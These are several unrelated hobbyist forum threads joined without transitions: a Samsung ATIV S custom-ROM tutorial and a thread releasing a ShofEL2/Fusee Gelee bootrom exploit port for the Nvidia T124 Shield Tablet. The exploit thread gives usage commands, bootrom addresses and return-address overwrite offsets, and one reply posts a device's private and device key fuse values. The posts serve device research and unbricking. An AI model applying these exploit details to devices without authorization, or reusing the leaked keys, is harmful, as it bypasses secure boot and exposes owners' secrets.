Should we report all (even minor/trivial) bugs or just report major bugs ( such as SOD) for now?
Click to expand...
Click to collapse
basically it's not obviously.
some bugs won't show anything in log. for example if BT isn't working in some android build, kernel log won't show anything.
May I ask this is only for reporting sods? I guess I can't report anything when the camera crashes in android for example. Btw I had never got sods. I really have the idea that it is caused by a slow sd card. Edit for other thing I have to use adb.

[TUT] How to make a custom ROM for Samsung ATIV S

This tutorial is about making a custom ROM for ATIV S or any other Samsung WP8 phone.
Samsung ROM files:
.wp8 - main file with OS and boot
.csc - file with regional info
.smd - ROM for WP7 devices
All those files have (almost) the same format. I call it SMD. Old .smd file can be unpacked using this instruction, back in time smd-tool was made for it, but format changed slightly. This process was only tested on ATIV S.
CSC
.csc files aren't flashed to device, those are just containers for MBN files. And MBN files are copied to DPP during flashing process.
AS ALWAYS YOU ARE MAKING THIS ON YOUR OWN RISK! AND GOOD LUCK
Tutorial contents
Basic:
Making custom CSC (.mbn)
Extracting SMD
How to work with "packed" partitions
What to edit in ROM
Packing SMD
Advanced:
Making CSC from MBN
Making developer ROM
Making custom CSC (.mbn)
Software
sam-tools
Any tool for mounting drive images (OSFMount)
MBN Creator
MBN Creator is a kitchen itself. It has some limitations, but creating MBNs with MBN Creator is very easy. This method is described in the end.
Unpacking CSC files
Official CSCs come in .csc files. Use smd-tool to unpack file.csc to csc_dump folder:
Code:
smd-tool /u file.csc /d csc_dump
Now mount DPP.bin and copy CSC.mbn file from it. Unmount DPP then.
Code:
\Samsung\CSC\CSC.mbn
Now use mbn-tool to extract files from csc.mbn to mbn_dump folder:
Code:
mbn-tool /u csc.mbn /d mbn_dump
Every folder in mbn_dump is for one CSC code. There are 4 files inside every folder (AUT for ex.):
SS_AUT.ini - init values for welcome screen (first boot). Language, region, timezone and carrier.
SS_AUT.reg - registry file.
SS_AUT_AppInstall.provxml - PROVXML file with (and only) install app instructions.
SS_AUT_CSC.xml - PROVXML file.
Warning! There is a size limit for any file ~50KB. MBN itself is limited to DPP free space.
Packing MBN
Code:
mbn-tool /p mbn_dump /f my.mbn /ver I8750OXXCMK2 /subver OXX
CSC version (I8750OXXCMK2) should be greater or equal to your ROM version. Otherwise it will be ignored. DOC2 CSC will work on CMK2 ROM, but not vice versa!
Warning! Official DNI and DOC ROMs don't support custom MBNs.
Using MBN Creator
You can apply predefined tweaks from 1st tab or add your own directly into files. Last tab contains MBN file properties. MBN Creator is limited to only one CSC code.
You can check your work in
Code:
MBN Creator temp
folder. Output file is CSC.mbn.
Flashing MBN with MBN Creator
Reboot phone into Download Mode
Connect to PC and install drivers
Copy or create CSC.mbn file
Press Flash, Scan
Choose CSC code and press Flash
All done. Reset phone. Perform HR if MBN didn't apply.
Warning! MBN Creator can't flash files larger than 64KB.
Flashing MBN with stock Downloader
Open .wp8 and .mbn files
Check "Select" and uncheck everything but "CSC"
If flasher asks you about something click NO
Extracting SMD
Software
sam-tools
Any tool for mounting drive images (OSFMount)
Unpack
Unpack file.wp8 to dump folder
Code:
smd-tool /u file.wp8 /d dump
Output example:
Code:
Partition name NAND off N size ROM off R size Part. ID Type Status
GPT 00000000 00000800 00200C00 0000FC00 00000000 00000000 [ OK ]
SECURE 00000800 00000800 00210800 00000400 00000001 00000000 [ OK ]
DPP 00001000 00004000 00210C00 00800000 00000002 00000000 [ OK ]
SBL1 00008000 00000BB7 00A10C00 0016A400 00000003 00000000 [ OK ]
SBL2 P 00009000 00000BB7 00B7B000 0016A400 00000004 00000000 [ OK ]
SBL3 0000A000 00000FFF 00CE5400 001F8000 00000005 00000000 [ OK ]
UEFI S 0000B000 00001387 00EDD400 00207C00 00000006 00000000 [ OK ]
RPM 0000D000 000003E7 010E5000 0006E400 00000007 00000000 [ OK ]
TZ 0000E000 000003E7 01153400 0006E400 00000008 00000000 [ OK ]
WINSECAPP 0000F000 000003FF 011C1800 0007E000 00000009 00000000 [ OK ]
PLAT 0001A000 00003FFF 0123F800 00742800 0000000A 00000000 [ OK ]
EFIESP 00020000 0001FFFF 01982000 0094A400 0000000B 00000000 [ OK ]
MMOS 00046000 0002403F 022CC400 0440B800 0000000C 00000000 [ OK ]
MainOS 0006C000 004B295F 066D7C00 61F20000 0000000D EACCE221 [ OK ]
Data 00520000 01838FFF 685F7C00 02920000 0000000E EACCE221 [ OK ]
Output files:
header - header of SMD
GPT - partition table
PLAT, EFIESP, MMOS - partitions with FAT file system
MainOS and Data - NTFS partitions
other files - bootloader and other low level stuff
DPP partition isn't flashed to phone. In wp8 file it's empty.
EACCE221 means that partition is packed.
How to work with "packed" partitions
Software
sam-tools
Any tool for mounting drive images (OSFMount)
Unpack
Large zero areas are cut off from those partitions. image-rebase can restore such files.
Code:
image-rebase /u MainOS.bin /o MainOS.img
You can now mount and edit MainOS.img.
Warning! Data partition is very large and almost empty.
Pack
First of all slice image file:
Code:
image-rebase /s MainOS.img /z 2048
This command will cut off zero areas larger than 2048 sectors (1MB).
MainOS.img.xml is a template file.
Now you can glue files together using template:
Code:
image-rebase /p MainOS.bin /t MainOS.img.xml
What to edit in ROM
CSCMgr
This service applies MBN file. The idea is to downgrade it to CMK2 (GDR3) version. To do so replace those files:
system32\CSCMgr.dll
system32\CSCMgrSvc.dll
system32\drivers\CSCMgrSvc.dll (yes, it's a copy)
FCRouter
This service is used by Samsung system tools to perform actions with high privileges. Files:
system32\FCRouter.dll
system32\FCRouterProxy.dll
system32\drivers\FCRouter.dll
system32\drivers\FCDriver.dll
Registry hives
Code:
system32\config
You can edit those hive as you want. But HR will destroy all you work.
OSRepack
It a simple tool to work with packages on mounted partitions. Available here.
SDelete
There is a tool called SDelete which can fill all free space on a drive with zeros.
Code:
sdelete -z X:
Very useful for non-developer ROMs.
Packing SMD
Software
sam-tools
Hex editor (HxD)
Pack MainOS image
Code:
image-rebase /s MainOS.img /z 2048
image-rebase /p MainOS.bin /t MainOS.img.xml
Prepare SMD header
It's not really a header but a first part of file. This file can be used as template for your later work. It contains all partitions except MainOS.
Code:
smd-tool /info file.wp8
This command will give you some info about SMD file structure. Open it in hex editor and copy all data up to MainOS ROM offset to a new file. Add Data.bin to this new file.
There are some structures at the start of file. For example:
4D 61 69 6E 4F 53 00 00 00 00 00 00 00 00 00 00
00 C0 06 00 5F 29 4B 00 00 7C FF 08 00 0E AD 61
1F 1F 1F 1F 00 00 00 00 21 E2 CC EA 00 00 00 00
2B C2 5E C9 6A 2F 0B E1 6F 1C 95 FC 49 FF E9 FD
Start and length are colored.
Warning! Those numbers are little endian (12345678 = 78 56 34 12)
Replace Data Start with MainOS Start. You can use Ctrl+C & Ctrl+B (copy and paste with replace).
Replace MainOS Start with length of this (template) file.
Save file.
Adding MainOS
Add MainOS.img to your template.
Replace MainOS Length with length (in bytes) of MainOS.bin file.
Replace 16 bytes at offset 0x50 with zeros.
Count MD5 hash of the file (HxD can do it) and write it at 0x50 (^C & ^B).
Save this file as .wp8
You can check numbers you entered with following command:
Code:
smd-tool /info custom.wp8
Warning! This .wp8 file can only be flashed with Downloader v3.54
Making CSC from MBN
Software
Hex editor (HxD)
Pack
Open CSC file in HxD.
At 0x00A00C00 it has MBN file contents.
Replace it with your MBN and fill rest of the CSC with zeros.
Warning! This file can't be unpacked with this instruction because FAT is broken. You can unpack it manually.
Correct MD5 as you did for WP8 file.
Warning! This CSC can fool Downloader but not phone. New CSCMgr will still ignore custom MBN.
Making developer ROM
Such ROMs can be directly mounted with OSFMount.
This command will pseudo slice MainOS.img:
Code:
image-rebase /s MainOS.img /z 4000000
Entire partition will be in one piece.
If you pack SMD with this file you can mount it and edit without repacking SMD.
In OSFMount enter offset equal to MainOS ROM offset + 0x1000.
Don't forget to recalculate MD5 after edit.
OMG, WOLF! People tell me that my tutorials are too long. But you are a true match for me!! :highfive:
Congrats on this great achievement! :victory:
Wow! Huge thanks for rewriting these tutorials in English; I wasn't expecting you to do it so soon! Can't wait to play around and to see what others come up with.
I play around with the replacement of files FC Router + WP8 Diag on my GT-I8750 (from the SM-W750V, SPH-I800, SGH-I187, SGH-T899M), in the end everything works.
Powered mode Smart Download.
so I could be possible to use ATIV S version of CSCMgr on SE. And SE then will have custom MBN
Yea, that's what I gathered from the info as well. Unfortunately I won't have time to try this out for another 4-7 days but I'll let you know if I do. And if you (or anyone else) feels like whipping it up and you need someone to try it, shoot me a PM.
Added info about sdelete and OSRepack to "What to edit in ROM"
I have an idea to record full process of ROM making and upload it on Youtube. Will it be useful?
Added poll.

Fusee Gelee / ShofEL2 exploit port for the T124 (Shield Tablet). AKA Dump SBK

I know that this comes a little bit late but this device still a good machine...
This could be used potentially to boot bricked devices. Unfortunately further work would be required since the Shield Tablet uses a private key (not on the device) to sign the bootloader and if I understand correctly from fuses, nvflash cmds. Probably it could be posible boot into Linux implementing something like shofelf2 does and reflash the emmc from it.... at the same time I don't have a bricked device to verify this.
My main aim with this was to learn about SOCs bootchain/baremetal and related protocols and maybe boot clean Debian with a clean uBoot.... I still pending to acknowledge the second but I really don't know how long will it take me... I don't have that much spare time and this took me almost 1 year and a half to earn the knowledge to reach this point...
ShofEL2 for T124
This is a Fusee Gelee / ShofEL2 exploit port for the Nvidia T124 (a.k.a Jetson TK1, Shield K1, etc).
Currently this code allows you to download and execute a payload to the T124, dump the fuses and memory and boot bct without apply the locks.
Mostly of my code is based on the original ShofEL2 code and Katherine Temkin research, so I cannot take that much credit for this.
See the original fail0verflow blog post: https://fail0verflow.com/blog/2018/shofel2/ See additional info at the original Katherine Temkin github: https://github.com/Qyriad/fusee-launcher/blob/master/report/fusee_gelee.md
Obligatory disclaimer
This code is provided without any warranty, use under your own resposability.
Usage
You need an arm-*-eabi toolkit. You can use Crosstool-ng compile it.
Build the loader and payloads:
$ cd ShofEL2-for-T124
$ make
Usage
$ ./shofel2_t124 ( MEM_DUMP | READ_FUSES | BOOT_BCT | PAYLOAD ) [options]
$ MEM_DUMP address length out_file -> Dumps "length" bytes starting from "address" to "out_file".
$ READ_FUSES out_file -> Dumps the T124 fuses to "out_file" and show them in console.
$ BOOT_BCT -> Boots BCT without applying locks.
$ PAYLOAD payload.bin [arm|thumb] -> Boots "payload.bin" the entrymode mode can be specified (thumb by default)
Interesting facts (maybe some of them wrong):
RCM loads the payload to IRAM at 0x4000E000 (described on tegrarcm source code).
RCM cmd format is sligitly different. RCM cmd header length is 0x284 bytes but the firtst 4 bytes still containing the RCM cmd length.
RCM cmd length restrictions are different to X1 bootrom:
Bulk transfers need to be multiply of 0x1000 to ensure use the whole usb buffer.
RCM cmd length minus 0x284 (header length) must be a multiple of 0x10 (which means RCM CMD length needs to end in 4).
RCM cmd min length is 0x404 bytes. Due to the previous condition the minimun length would be 0x1004.
RCM cmd length cannot exceed avaiable IRAM for the payload (from 0x4000E000 till 0x4003FFFF).
With all this in mind max RCM cmd length is 0x32274 bytes.
Since the exploit uses usb buffer 2, only 0x31000 bytes can be used for the payload in order to avoid finishing the RCM cmd.
A payload can still be loaded using the same path as the one used by the original shofEL2, since no validation is carried out till the whole payload is received.
Even if the specs says that the JTAG is enabled by default, cold bootrom code disasbles it while is runnig (not as dumb as expected ).
RCM runs on an ARM7TDMI core, I manage to halt the CPU on uboot using a Segger J-LINK.
When the poisoned get status is executed, 0x30C bytes will be copied before the payload. These bytes are part of the execution stack, starting with the USB status var.
Using the original sanity_check function from shofel2, I got from the execution stack that the RCM USB buffers are located at 0x40004000 and 0x40008000.
Two USB buffers of 0x1000 bytes still present. They still alternating on each USB txn. And odd number of USB txn will let you on the hight buffer for the next txn.
Using the original sanity_check function from shofel2, I got from the execution stack that the memcpy return address is located at 0x4000DCD8 (0x4000DCF4 - 0xC - 2 * 4 - 2 * 4).
The position in the RCM cmd where the entry adress need to be write to smash the memcpy return address is calculated as follow:
n_bytes_to_copy = 0x4000DCD8 - 0x40008000 (memcpy_ret_add_loc - usb_buf2_add) -> n_bytes_to_copy = 0x5CD8 bytes
pos_in_payload = n_bytes_to_copy - 0x30C (copied from the execution stack) - 0x4 -> pos_in_payload = 0x59C8
pos_in_rcm_cmd = pos_in_payload + 0x284 (header length) -> pos_in_rcm_cmd = 0x5C4C
I found the following functions on the the bootrom:
void ep1_in_write_imm(void *buffer, u32 size, u32 *num_xfer) -> 0x001065C0 -> Writes EP1_IN
void ep1_out_read_imm(void *buffer, u32 size, u32 *num_xfer) -> 0x00106612 -> Reads EP1_OUT
void do_bct_boot() -> 0x00100624 -> Boots BCT without applying locks.Hello
Source: https://github.com/LordRafa/ShofEL2-for-T124/releases
Great work! Does this mean you could in theory push payloads made for the switch to the K1, as they are both tegra-based devices?
xdpirate said:
Great work! Does this mean you could in theory push payloads made for the switch to the K1, as they are both tegra-based devices?
Click to expand...
Click to collapse
Well, yes that is partially right but bear in mind that these payloads relies sometimes on the switch peripherals, so for example if you want to show something on the LCD it will not work because the shield and switch LCDs controllers aint the same, the code will run on the boot CPU but the LCD will not work because they don't work in the same way... It is something like use the wrong driver for a device.
Also you need to understand that the payloads normally are used as first stage loader for something else, if that something else is wrote for the switch app CPU it will not work at all. Switch Tegra app CPU is an arm64 CPU and shield app CPU is a 32bit armv7 so they are not compatible. E.g. this is why I cannot run the Switch Linux directly on my shield.... and even if they could work, again you will find the problem of the peripherals and many others customized things for Nintendo... that is why a Shield TV is not a Switch... same same... but different.
This can be more useful to those people that are interesting to do some research around this device.
Is it possible to unbrick a Shield Tablet killed with this ?
Tonio1987french said:
Is it possible to unbrick a Shield Tablet killed with this ?
Click to expand...
Click to collapse
With some additional development I think that it could be posible. Unfortunately I don't have a killed device to work on this.
Someone that would like to work on this, would need to check where the kill switch is enabled and where is verified.
If I understand correctly this would be the boot chain: bootrom -> nvtboot ( boot cpu code ) -> nvtboot ( app cpu code ) -> second stage bootloader( uboot/fastboot??? ) -> Android.
I would be tempted to think that nvtboot at boot cpu is the responsible to check if the kill switch has been enabled, or maybe the kill switch just modifies the bct header to break the boot chain... If I am right then maybe it would be posible to use shoelf2 to restore a backup to the emmc.
A payload would still need to be developed to being able to read/write the emmc using shoelf2. This is something that I am considering to implement as part of the works porting mainline Linux.
Also it would be nice to see if all devices shares the same private key that would be great because anyone could read a working shield emmc and share it to restore a killed one... if anyone could share the fuse dump, that my shoelf2 generates I could answer this question....
Anyway I would require a killed switch to being able to work on this... My main focus now is run mainline Linux....
Lord_Rafa said:
With some additional development I think that it could be posible. Unfortunately I don't have a killed device to work on this.
Someone that would like to work on this, would need to check where the kill switch is enabled and where is verified.
If I understand correctly this would be the boot chain: bootrom -> nvtboot ( boot cpu code ) -> nvtboot ( app cpu code ) -> second stage bootloader( uboot/fastboot??? ) -> Android.
I would be tempted to think that nvtboot at boot cpu is the responsible to check if the kill switch has been enabled, or maybe the kill switch just modifies the bct header to break the boot chain... If I am right then maybe it would be posible to use shoelf2 to restore a backup to the emmc.
A payload would still need to be developed to being able to read/write the emmc using shoelf2. This is something that I am considering to implement as part of the works porting mainline Linux.
Also it would be nice to see if all devices shares the same private key that would be great because anyone could read a working shield emmc and share it to restore a killed one... if anyone could share the fuse dump, that my shoelf2 generates I could answer this question....
Anyway I would require a killed switch to being able to work on this... My main focus now is run mainline Linux....
Click to expand...
Click to collapse
I do have a killed Shield Tablet LTE. Where are you from?
The OTA that kills the tablet has been dissected here: https://forum.xda-developers.com/shield-tablet/general/kill-kill-switch-shield-tablet-xx-t3179489
Once flashed the tablet doesn't give any signs of life, and goes only in APX mode when connected:
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Is it possible to use ShoEL in APX mode? I don't think?
Gave a quick try compiling crosstool-ng on Debian 8 but it's hanging at make, will have a look at it later.
On a side note, one user (Drims75) from Ukraine restores motherboard for a modic cost, you can find a couple of user who sent their motherboard to him: https://forum.xda-developers.com/showpost.php?p=71516196&postcount=139
Thanks for your work!
I can confirm the exploit is working.
Thanks so much LordRafa, you're a legend!
How do i get the SBK Key? Is the FUSE_PRIVATE_KEY i get via READ_FUSES the SBK? And is it possible to dump the BIS keys? The biskeydump payload seems only working for switch. Anyone has a biskeydump payload for t124?
This is absolutely awesome.
I have a bricked shield tablet, here is the output from the fuses:
Waiting T124 to enter RCM mode (ctrl-c to cancel). Note: root permission could be required.
K1 in RCM mode connected.
Chip ID: 0x40 0x02 0x07 0x01 0x00 0x00 0x00 0x10 0x09 0xa1 0x0c 0x74 0x01 0x10 0x00 0x64
Hacky Get Status returned error... Probably the stack got smashed, Congrats
Dumping 768 bytes from 0x7000f900.
FUSE_PRODUCTION_MODE: 00000001
FUSE_JTAG_SECUREID_VALID: 00000001
FUSE_ODM_LOCK: 00000006
FUSE_OPT_OPENGL_EN: 00000001
FUSE_SKU_INFO: 0000001f
FUSE_CPU_SPEEDO_0_CALIB: 000008cd
FUSE_CPU_IDDQ_CALIB: 0000030f
RESERVED_0x01C: 00000000
RESERVED_0x020: 00000000
RESERVED_0x024: 00000000
FUSE_OPT_FT_REV: 00000022
FUSE_CPU_SPEEDO_1_CALIB: 00000000
FUSE_CPU_SPEEDO_2_CALIB: 000007fe
FUSE_SOC_SPEEDO_0_CALIB: 0000089f
FUSE_SOC_SPEEDO_1_CALIB: 00000000
FUSE_SOC_SPEEDO_2_CALIB: 00000000
FUSE_SOC_IDDQ_CALIB: 0000025f
RESERVED_0x044: 00000000
FUSE_FA: 00000000
FUSE_RESERVED_PRODUCTION: 00000002
FUSE_HDMI_LANE0_CALIB: 00000000
FUSE_HDMI_LANE1_CALIB: 00000000
FUSE_HDMI_LANE2_CALIB: 00000000
FUSE_HDMI_LANE3_CALIB: 00000000
FUSE_ENCRYPTION_RATE: 00000000
FUSE_PUBLIC_KEY 0-3: bc420312 298f5d3c a5abe328 9e556001
FUSE_PUBLIC_KEY 4-7: 0eefbfaa 756a7b0f b7507e2f 149672c4
FUSE_TSENSOR1_CALIB: 03a27cbb
FUSE_TSENSOR2_CALIB: 03ee9ee6
RESERVED_0x08C: 00000000
FUSE_OPT_CP_REV: 00000022
FUSE_OPT_PFG: 00000000
FUSE_TSENSOR0_CALIB: 0053a324
FUSE_BOOTROM_PATCH_SIZE: 00000002
FUSE_SECURITY_MODE: 00000001
FUSE_PRIVATE_KEY: 5f244a57 d0197865 940f80a3 15484c8f
FUSE_DEVICE_KEY: 5e65bbde
FUSE_ARM_DEBUG_DIS: 00000000
FUSE_BOOT_DEVICE_INFO: 00000000
FUSE_RESERVED_SW: 00000000
FUSE_VP8_ENABLE: 00000001
FUSE_RESERVED_ODM 0-3: 00000000 00007090 0000000b 00000000
FUSE_RESERVED_ODM 4-7: 00000000 00000000 00000000 00000000
FUSE_OBS_DIS: 00000000
RESERVED_0x0EC: 00000000
FUSE_USB_CALIB: 02c6038b
FUSE_SKU_DIRECT_CONFIG: 00000000
FUSE_KFUSE_PRIVKEY_CTRL: 00000003
FUSE_PACKAGE_INFO: 00000004
FUSE_OPT_VENDOR_CODE: 00000000
FUSE_OPT_FAB_CODE: 00000000
FUSE_OPT_LOT_CODE_0: 00000000
FUSE_OPT_LOT_CODE_1: 00000000
FUSE_OPT_WAFER_ID: 00000000
FUSE_OPT_X_COORDINATE: 00000000
FUSE_OPT_Y_COORDINATE: 00000000
FUSE_OPT_SEC_DEBUG_EN: 00000000
FUSE_OPT_OPS_RESERVED: 00000000
FUSE_SATA_CALIB: 00000000
FUSE_GPU_IDDQ_CALIB: 0000036e
FUSE_TSENSOR3_CALIB: 03e21f59
FUSE_SKU_BOND_OUT_L: 00000000
FUSE_SKU_BOND_OUT_H: 00000000
FUSE_SKU_BOND_OUT_U: 00000000
FUSE_SKU_BOND_OUT_V: 00000000
FUSE_SKU_BOND_OUT_W: 00000000
RESERVED_0x144: 00000000
FUSE_OPT_SUBREVISION: 00000000
FUSE_OPT_SW_RESERVED_0: 00000000
FUSE_OPT_SW_RESERVED_1: 00000000
FUSE_TSENSOR4_CALIB: 03b41d91
FUSE_TSENSOR5_CALIB: 0024c106
FUSE_TSENSOR6_CALIB: 03f15f1c
FUSE_TSENSOR7_CALIB: 00788335
FUSE_OPT_PRIV_SEC_EN: 00000000
FUSE_PKC_DISABLE: 00000000
RESERVED_0x16C: 00000000
RESERVED_0x170: 00000000
RESERVED_0x174: 00000000
RESERVED_0x178: 00000000
FUSE_FUSE2TSEC_DEBUG_DISABLE: 00000001
FUSE_TSENSOR8_CALIB: 00173ab1
FUSE_OPT_CP_BIN: 00000003
FUSE_OPT_GPU_FS: 00000000
FUSE_OPT_FT_BIN: 00000001
RESERVED_0x190: 00000000
FUSE_SKU_BOND_OUT_X: 00000000
FUSE_APB2JTAG_DISABLE: 00000000
RESERVED_0x19C: 00000000
FUSE_PHY_FLOORSWEEP: 00000000
FUSE_PHY_FLOOR_ENABLE: 00000000
FUSE_ARM_CRYPT_DE_FEATURE: 00000000
FUSE_DENVER_MTS_DE_FEATURE: 00000000
FUSE_DIE_VERSION_OVERRIDE: 00000000
FUSE_TRIMMERS: 00000000
FUSE_DENVER_BOOT_SEC: 00000000
FUSE_DENVER_DFD_ACCESS: 00000000
FUSE_WOA_SKU_FLAG: 00000000
FUSE_ECO_RESERVE_1: 00000000
FUSE_GCPLEX_CONFIG_FUSE: 00000002
RESERVED_0x1CC: 00000000
RESERVED_0x1D0: 00000000
RESERVED_0x1D4: 00000000
RESERVED_0x1D8: 00000000
RESERVED_0x1DC: 00000000
RESERVED_0x1E0: 00000000
RESERVED_0x1E4: 00000000
RESERVED_0x1E8: 00000000
RESERVED_0x1EC: 00000000
RESERVED_0x1F0: 00000000
RESERVED_0x1F4: 00000000
RESERVED_0x1F8: 00000000
FUSE_SPARE_REALIGNMENT_REG: 00000000
FUSE_SPARE_BITS 00-03: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 04-07: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 08-11: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 12-15: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 16-19: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 20-23: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 24-27: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 28-31: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 32-35: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 36-39: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 40-43: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 44-47: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 48-51: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 52-55: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 56-59: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 60-63: 00000000 00000000 00000000 00000000
Lord_Rafa said:
With some additional development I think that it could be posible. Unfortunately I don't have a killed device to work on this.
Someone that would like to work on this, would need to check where the kill switch is enabled and where is verified.
If I understand correctly this would be the boot chain: bootrom -> nvtboot ( boot cpu code ) -> nvtboot ( app cpu code ) -> second stage bootloader( uboot/fastboot??? ) -> Android.
I would be tempted to think that nvtboot at boot cpu is the responsible to check if the kill switch has been enabled, or maybe the kill switch just modifies the bct header to break the boot chain... If I am right then maybe it would be posible to use shoelf2 to restore a backup to the emmc.
A payload would still need to be developed to being able to read/write the emmc using shoelf2. This is something that I am considering to implement as part of the works porting mainline Linux.
Also it would be nice to see if all devices shares the same private key that would be great because anyone could read a working shield emmc and share it to restore a killed one... if anyone could share the fuse dump, that my shoelf2 generates I could answer this question....
Anyway I would require a killed switch to being able to work on this... My main focus now is run mainline Linux....
Click to expand...
Click to collapse
Did you have any success running/porting mainline linux?
Would this dump the key required to nvflash u-boot?
Edit: I think I understand enough now to know why this is a dumb question. One would use tegrarcm, not nvflash.
Fuses - Nintendo Switch Brew
switchbrew.org
Edit: From NVidia's bct-overview:
When a chip has an RSA public key (PKC) programmed into its flash, it expects the BCT to contain RSA-PSS signatures created/validated using that key pair. When a chip has an AES key (SBK; Secure Boot Key) programmed into its flash, it expects the BCT to contain AES-CMAC hashes created/validated using that key.
Click to expand...
Click to collapse
Has anyone done any testing around what that means for devices with both PKC and SBK? As in does it validate both, either or a does one take precedence over the other?

Categories

Resources